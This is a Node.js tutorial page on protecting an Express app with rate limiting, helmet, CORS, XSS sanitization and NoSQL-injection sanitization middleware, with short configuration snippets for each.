Rate Limiting and Security in NodeJS

Written By: Avinash Malhotra

Updated on

Node JS Tutorial rating Average rating: 5.0, based on 159 reviews
  1. Home
  2. Node JS
  3. Rate Limiting and Security in NodeJS
  1. Rate Limiting
  2. Helmet
  3. CORS
  4. XSS
  5. Prevent NoSQL Injection

Security is one of the most important parts of any backend application.

When your APP goes live, it becomes open to bots, attackers, spammers, and heavy traffic that can overload your server.

Two very important ways to protect your Node.js application are

  1. Rate Limiting
  2. Security Middlewares (helmet, cors, sanitization, etc.)

Let's understand both in a simple and practical way.

Rate Limiting

Rate limiting means controlling how many requests a user can make to your server within a specific time.

This helps prevent abuse, such as DDoS attacks, and ensures fair usage of your resources.

In Node.js, we can use the express-rate-limit middleware to implement rate limiting easily.


const express = require("express");
const rateLimit = require("express-rate-limit");

const app = express();

const limiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100, // limit each IP to 100 requests per window
  message: "Too many requests from this IP, please try again later."
});

app.use(limiter);

app.get("/", (req, res) => {
  res.send("API is working fine");
});

app.listen(3000);

Explanation

  1. We import the express-rate-limit package
  2. We create a limiter with a 15-minute window and a max of 100 requests per IP
  3. We apply the limiter to all routes using app.use(limiter)
  4. If a user exceeds the limit, they receive a custom message

Limiter for login attempts

You can also create specific limiters for sensitive routes like login to prevent brute-force attacks.


const loginLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 5, // limit each IP to 5 login requests per window
  message: "Too many login attempts from this IP, please try again later."
});

app.post("/login", loginLimiter, (req, res) => {
  // login logic here
});

Helmet - Security Middleware

Helmet helps secure your Express apps by setting various HTTP headers. It's a simple way to improve your app's security.

Helmet protects your app from some well-known web vulnerabilities by setting HTTP headers appropriately.

  1. XSS attacks
  2. Clickjacking
  3. MIME sniffing
  4. Injection attacks

const helmet = require("helmet");
app.use(helmet());

CORS - Cross-Origin Resource Sharing

CORS allows you to control which domains can access your resources, enhancing security by preventing unauthorized cross-origin requests.


const cors = require("cors");
app.use(cors({
     origin: "https://your-allowed-domain.com"
}));

Now your Express app is configured to accept requests only from the specified domain.

Prevent XSS Attacks

To prevent XSS attacks, you can use libraries like xss-clean to sanitize user input.


const xss = require("xss-clean");
app.use(xss());

This middleware will sanitize any user input from malicious HTML or JavaScript code.

Prevent NoSQL Injection (MongoDB)

To prevent NoSQL injection attacks, you can use libraries like express-mongo-sanitize to sanitize user input.


const mongoSanitize = require("express-mongo-sanitize");
app.use(mongoSanitize());

This middleware will remove any keys containing prohibited characters like $gt, $or from user input.